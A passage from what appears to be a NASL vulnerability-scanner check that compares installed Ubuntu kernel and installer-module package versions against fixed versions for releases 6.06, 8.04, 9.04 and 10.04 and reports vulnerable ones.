security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"usb-modules-2.6.15-55-386-di\", ver:\"2.6.15-55.89\", rls:\"UBUNTU6.06 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"usb-storage-modules-2.6.15-55-386-di\", ver:\"2.6.15-55.89\", rls:\"UBUNTU6.06 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"xfs-modules-2.6.15-55-386-di\", ver:\"2.6.15-55.89\", rls:\"UBUNTU6.06 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n\n\nif(release == \"UBUNTU10.04 LTS\")\n{\n\n if ((res = isdpkgvuln(pkg:\"linux-headers-2.6.32-309-ec2\", ver:\"2.6.32-309.18\", rls:\"UBUNTU10.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-2.6.32-309-ec2\", ver:\"2.6.32-309.18\", rls:\"UBUNTU10.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-headers-2.6.32-25-386\", ver:\"2.6.32-25.45\", rls:\"UBUNTU10.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-headers-2.6.32-25-generic-pae\", ver:\"2.6.32-25.45\", rls:\"UBUNTU10.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-headers-2.6.32-25-generic\", ver:\"2.6.32-25.45\", rls:\"UBUNTU10.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-2.6.32-25-386\", ver:\"2.6.32-25.45\", rls:\"UBUNTU10.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-2.6.32-25-generic-pae\", ver:\"2.6.32-25.45\", rls:\"UBUNTU10.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-2.6.32-25-generic\", ver:\"2.6.32-25.45\", rls:\"UBUNTU10.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-2.6.32-25-virtual\", ver:\"2.6.32-25.45\", rls:\"UBUNTU10.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-libc-dev\", ver:\"2.6.32-25.45\", rls:\"UBUNTU10.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-tools-2.6.32-25\", ver:\"2.6.32-25.45\", rls:\"UBUNTU10.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-ec2-doc\", ver:\"2.6.32-309.18\", rls:\"UBUNTU10.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-ec2-source-2.6.32\", ver:\"2.6.32-309.18\", rls:\"UBUNTU10.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-headers-2.6.32-309\", ver:\"2.6.32-309.18\", rls:\"UBUNTU10.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-doc\", ver:\"2.6.32-25.45\", rls:\"UBUNTU10.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-headers-2.6.32-25\", ver:\"2.6.32-25.45\", rls:\"UBUNTU10.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-source-2.6.32\", ver:\"2.6.32-25.45\", rls:\"UBUNTU10.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-tools-common\", ver:\"2.6.32-25.45\", rls:\"UBUNTU10.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"block-modules-2.6.32-25-generic-di\", ver:\"2.6.32-25.45\", rls:\"UBUNTU10.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"block-modules-2.6.32-25-generic-pae-di\", ver:\"2.6.32-25.45\", rls:\"UBUNTU10.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"char-modules-2.6.32-25-generic-di\", ver:\"2.6.32-25.45\", rls:\"UBUNTU10.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"char-modules-2.6.32-25-generic-pae-di\", ver:\"2.6.32-25.45\", rls:\"UBUNTU10.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"crypto-modules-2.6.32-25-generic-di\", ver:\"2.6.32-25.45\", rls:\"UBUNTU10.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"crypto-modules-2.6.32-25-generic-pae-di\", ver:\"2.6.32-25.45\", rls:\"UBUNTU10.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"fat-modules-2.6.32-25-generic-di\", ver:\"2.6.32-25.45\", rls:\"UBUNTU10.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"fat-modules-2.6.32-25-generic-pae-di\", ver:\"2.6.32-25.45\", rls:\"UBUNTU10.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"fb-modules-2.6.32-25-generic-di\", ver:\"2.6.32-25.45\", rls:\"UBUNTU10.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"fb-modules-2.6.32-25-generic-pae-di\", ver:\"2.6.32-25.45\", rls:\"UBUNTU10.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"firewire-core-modules-2.6.32-25-generic-di\", ver:\"2.6.32-25.45\", rls:\"UBUNTU10.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"firewire-core-modules-2.6.32-25-generic-pae-di\", ver:\"2.6.32-25.45\", rls:\"UBUNTU10.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"floppy-modules-2.6.32-25-generic-di\", ver:\"2.6.32-25.45\", rls:\"UBUNTU10.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"floppy-modules-2.6.32-25-generic-pae-di\", ver:\"2.6.32-25.45\", rls:\"UBUNTU10.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"fs-core-modules-2.6.32-25-generic-di\", ver:\"2.6.32-25.45\", rls:\"UBUNTU10.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"fs-core-modules-2.6.32-25-generic-pae-di\", ver:\"2.6.32-25.45\", rls:\"UBUNTU10.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"fs-secondary-modules-2.6.32-25-generic-di\", ver:\"2.6.32-25.45\", rls:\"UBUNTU10.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"fs-secondary-modules-2.6.32-25-generic-pae-di\", ver:\"2.6.32-25.45\", rls:\"UBUNTU10.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"input-modules-2.6.32-25-generic-di\", ver:\"2.6.32-25.45\", rls:\"UBUNTU10.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"input-modules-2.6.32-25-generic-pae-di\", ver:\"2.6.32-25.45\", rls:\"UBUNTU10.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"irda-modules-2.6.32-25-generic-di\", ver:\"2.6.32-25.45\", rls:\"UBUNTU10.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"irda-modules-2.6.32-25-generic-pae-di\", ver:\"2.6.32-25.45\", rls:\"UBUNTU10.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"kernel-image-2.6.32-25-generic-di\", ver:\"2.6.32-25.45\", rls:\"UBUNTU10.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"kernel-image-2.6.32-25-generic-pae-di\", ver:\"2.6.32-25.45\", rls:\"UBUNTU10.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"md-modules-2.6.32-25-generic-di\", ver:\"2.6.32-25.45\", rls:\"UBUNTU10.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"md-modules-2.6.32-25-generic-pae-di\", ver:\"2.6.32-25.45\", rls:\"UBUNTU10.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"message-modules-2.6.32-25-generic-di\", ver:\"2.6.32-25.45\", rls:\"UBUNTU10.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"message-modules-2.6.32-25-generic-pae-di\", ver:\"2.6.32-25.45\", rls:\"UBUNTU10.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"mouse-modules-2.6.32-25-generic-di\", ver:\"2.6.32-25.45\", rls:\"UBUNTU10.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"mouse-modules-2.6.32-25-generic-pae-di\", ver:\"2.6.32-25.45\", rls:\"UBUNTU10.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"nfs-modules-2.6.32-25-generic-di\", ver:\"2.6.32-25.45\", rls:\"UBUNTU10.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"nfs-modules-2.6.32-25-generic-pae-di\", ver:\"2.6.32-25.45\", rls:\"UBUNTU10.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"nic-modules-2.6.32-25-generic-di\", ver:\"2.6.32-25.45\", rls:\"UBUNTU10.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"nic-modules-2.6.32-25-generic-pae-di\", ver:\"2.6.32-25.45\", rls:\"UBUNTU10.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"nic-pcmcia-modules-2.6.32-25-generic-di\", ver:\"2.6.32-25.45\", rls:\"UBUNTU10.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"nic-pcmcia-modules-2.6.32-25-generic-pae-di\", ver:\"2.6.32-25.45\", rls:\"UBUNTU10.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"nic-shared-modules-2.6.32-25-generic-di\", ver:\"2.6.32-25.45\", rls:\"UBUNTU10.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"nic-shared-modules-2.6.32-25-generic-pae-di\", ver:\"2.6.32-25.45\", rls:\"UBUNTU10.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"nic-usb-modules-2.6.32-25-generic-di\", ver:\"2.6.32-25.45\", rls:\"UBUNTU10.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"nic-usb-modules-2.6.32-25-generic-pae-di\", ver:\"2.6.32-25.45\", rls:\"UBUNTU10.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"parport-modules-2.6.32-25-generic-di\", ver:\"2.6.32-25.45\", rls:\"UBUNTU10.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"parport-modules-2.6.32-25-generic-pae-di\", ver:\"2.6.32-25.45\", rls:\"UBUNTU10.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"pata-modules-2.6.32-25-generic-di\", ver:\"2.6.32-25.45\", rls:\"UBUNTU10.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"pata-modules-2.6.32-25-generic-pae-di\", ver:\"2.6.32-25.45\", rls:\"UBUNTU10.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"pcmcia-modules-2.6.32-25-generic-di\", ver:\"2.6.32-25.45\", rls:\"UBUNTU10.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"pcmcia-modules-2.6.32-25-generic-pae-di\", ver:\"2.6.32-25.45\", rls:\"UBUNTU10.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"pcmcia-storage-modules-2.6.32-25-generic-di\", ver:\"2.6.32-25.45\", rls:\"UBUNTU10.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"pcmcia-storage-modules-2.6.32-25-generic-pae-di\", ver:\"2.6.32-25.45\", rls:\"UBUNTU10.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"plip-modules-2.6.32-25-generic-di\", ver:\"2.6.32-25.45\", rls:\"UBUNTU10.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"plip-modules-2.6.32-25-generic-pae-di\", ver:\"2.6.32-25.45\", rls:\"UBUNTU10.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"ppp-modules-2.6.32-25-generic-di\", ver:\"2.6.32-25.45\", rls:\"UBUNTU10.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"ppp-modules-2.6.32-25-generic-pae-di\", ver:\"2.6.32-25.45\", rls:\"UBUNTU10.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"sata-modules-2.6.32-25-generic-di\", ver:\"2.6.32-25.45\", rls:\"UBUNTU10.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"sata-modules-2.6.32-25-generic-pae-di\", ver:\"2.6.32-25.45\", rls:\"UBUNTU10.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"scsi-modules-2.6.32-25-generic-di\", ver:\"2.6.32-25.45\", rls:\"UBUNTU10.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"scsi-modules-2.6.32-25-generic-pae-di\", ver:\"2.6.32-25.45\", rls:\"UBUNTU10.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"serial-modules-2.6.32-25-generic-di\", ver:\"2.6.32-25.45\", rls:\"UBUNTU10.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"serial-modules-2.6.32-25-generic-pae-di\", ver:\"2.6.32-25.45\", rls:\"UBUNTU10.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"squashfs-modules-2.6.32-25-generic-di\", ver:\"2.6.32-25.45\", rls:\"UBUNTU10.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"squashfs-modules-2.6.32-25-generic-pae-di\", ver:\"2.6.32-25.45\", rls:\"UBUNTU10.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"storage-core-modules-2.6.32-25-generic-di\", ver:\"2.6.32-25.45\", rls:\"UBUNTU10.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"storage-core-modules-2.6.32-25-generic-pae-di\", ver:\"2.6.32-25.45\", rls:\"UBUNTU10.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"usb-modules-2.6.32-25-generic-di\", ver:\"2.6.32-25.45\", rls:\"UBUNTU10.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"usb-modules-2.6.32-25-generic-pae-di\", ver:\"2.6.32-25.45\", rls:\"UBUNTU10.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"virtio-modules-2.6.32-25-generic-di\", ver:\"2.6.32-25.45\", rls:\"UBUNTU10.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"virtio-modules-2.6.32-25-generic-pae-di\", ver:\"2.6.32-25.45\", rls:\"UBUNTU10.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"vlan-modules-2.6.32-25-generic-di\", ver:\"2.6.32-25.45\", rls:\"UBUNTU10.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"vlan-modules-2.6.32-25-generic-pae-di\", ver:\"2.6.32-25.45\", rls:\"UBUNTU10.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n\n\nif(release == \"UBUNTU9.04\")\n{\n\n if ((res = isdpkgvuln(pkg:\"linux-headers-2.6.28-19-generic\", ver:\"2.6.28-19.66\", rls:\"UBUNTU9.04\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-headers-2.6.28-19-server\", ver:\"2.6.28-19.66\", rls:\"UBUNTU9.04\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-2.6.28-19-generic\", ver:\"2.6.28-19.66\", rls:\"UBUNTU9.04\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-2.6.28-19-server\", ver:\"2.6.28-19.66\", rls:\"UBUNTU9.04\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-2.6.28-19-virtual\", ver:\"2.6.28-19.66\", rls:\"UBUNTU9.04\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-libc-dev\", ver:\"2.6.28-19.66\", rls:\"UBUNTU9.04\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-doc-2.6.28\", ver:\"2.6.28-19.66\", rls:\"UBUNTU9.04\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-headers-2.6.28-19\", ver:\"2.6.28-19.66\", rls:\"UBUNTU9.04\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-source-2.6.28\", ver:\"2.6.28-19.66\", rls:\"UBUNTU9.04\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"block-modules-2.6.28-19-generic-di\", ver:\"2.6.28-19.66\", rls:\"UBUNTU9.04\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"crypto-modules-2.6.28-19-generic-di\", ver:\"2.6.28-19.66\", rls:\"UBUNTU9.04\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"fat-modules-2.6.28-19-generic-di\", ver:\"2.6.28-19.66\", rls:\"UBUNTU9.04\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"fb-modules-2.6.28-19-generic-di\", ver:\"2.6.28-19.66\", rls:\"UBUNTU9.04\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"firewire-core-modules-2.6.28-19-generic-di\", ver:\"2.6.28-19.66\", rls:\"UBUNTU9.04\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"floppy-modules-2.6.28-19-generic-di\", ver:\"2.6.28-19.66\", rls:\"UBUNTU9.04\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"fs-core-modules-2.6.28-19-generic-di\", ver:\"2.6.28-19.66\", rls:\"UBUNTU9.04\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"fs-secondary-modules-2.6.28-19-generic-di\", ver:\"2.6.28-19.66\", rls:\"UBUNTU9.04\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"input-modules-2.6.28-19-generic-di\", ver:\"2.6.28-19.66\", rls:\"UBUNTU9.04\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"irda-modules-2.6.28-19-generic-di\", ver:\"2.6.28-19.66\", rls:\"UBUNTU9.04\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"kernel-image-2.6.28-19-generic-di\", ver:\"2.6.28-19.66\", rls:\"UBUNTU9.04\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"md-modules-2.6.28-19-generic-di\", ver:\"2.6.28-19.66\", rls:\"UBUNTU9.04\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"message-modules-2.6.28-19-generic-di\", ver:\"2.6.28-19.66\", rls:\"UBUNTU9.04\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"mouse-modules-2.6.28-19-generic-di\", ver:\"2.6.28-19.66\", rls:\"UBUNTU9.04\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"nfs-modules-2.6.28-19-generic-di\", ver:\"2.6.28-19.66\", rls:\"UBUNTU9.04\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"nic-modules-2.6.28-19-generic-di\", ver:\"2.6.28-19.66\", rls:\"UBUNTU9.04\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"nic-pcmcia-modules-2.6.28-19-generic-di\", ver:\"2.6.28-19.66\", rls:\"UBUNTU9.04\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"nic-shared-modules-2.6.28-19-generic-di\", ver:\"2.6.28-19.66\", rls:\"UBUNTU9.04\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"nic-usb-modules-2.6.28-19-generic-di\", ver:\"2.6.28-19.66\", rls:\"UBUNTU9.04\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"parport-modules-2.6.28-19-generic-di\", ver:\"2.6.28-19.66\", rls:\"UBUNTU9.04\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"pata-modules-2.6.28-19-generic-di\", ver:\"2.6.28-19.66\", rls:\"UBUNTU9.04\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"pcmcia-modules-2.6.28-19-generic-di\", ver:\"2.6.28-19.66\", rls:\"UBUNTU9.04\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"pcmcia-storage-modules-2.6.28-19-generic-di\", ver:\"2.6.28-19.66\", rls:\"UBUNTU9.04\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"plip-modules-2.6.28-19-generic-di\", ver:\"2.6.28-19.66\", rls:\"UBUNTU9.04\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"ppp-modules-2.6.28-19-generic-di\", ver:\"2.6.28-19.66\", rls:\"UBUNTU9.04\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"sata-modules-2.6.28-19-generic-di\", ver:\"2.6.28-19.66\", rls:\"UBUNTU9.04\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"scsi-modules-2.6.28-19-generic-di\", ver:\"2.6.28-19.66\", rls:\"UBUNTU9.04\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"serial-modules-2.6.28-19-generic-di\", ver:\"2.6.28-19.66\", rls:\"UBUNTU9.04\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"storage-core-modules-2.6.28-19-generic-di\", ver:\"2.6.28-19.66\", rls:\"UBUNTU9.04\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"usb-modules-2.6.28-19-generic-di\", ver:\"2.6.28-19.66\", rls:\"UBUNTU9.04\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"virtio-modules-2.6.28-19-generic-di\", ver:\"2.6.28-19.66\", rls:\"UBUNTU9.04\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n\n\nif(release == \"UBUNTU8.04 LTS\")\n{\n\n if ((res = isdpkgvuln(pkg:\"linux-headers-2.6.24-28-386\", ver:\"2.6.24-28.80\", rls:\"UBUNTU8.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-headers-2.6.24-28-generic\", ver:\"2.6.24-28.80\", rls:\"UBUNTU8.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-headers-2.6.24-28-openvz\", ver:\"2.6.24-28.80\", rls:\"UBUNTU8.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-headers-2.6.24-28-rt\", ver:\"2.6.24-28.80\", rls:\"UBUNTU8.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-headers-2.6.24-28-server\", ver:\"2.6.24-28.80\", rls:\"UBUNTU8.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-headers-2.6.24-28-virtual\", ver:\"2.6.24-28.80\", rls:\"UBUNTU8.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-headers-2.6.24-28-xen\", ver:\"2.6.24-28.80\", rls:\"UBUNTU8.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-2.6.24-28-386\", 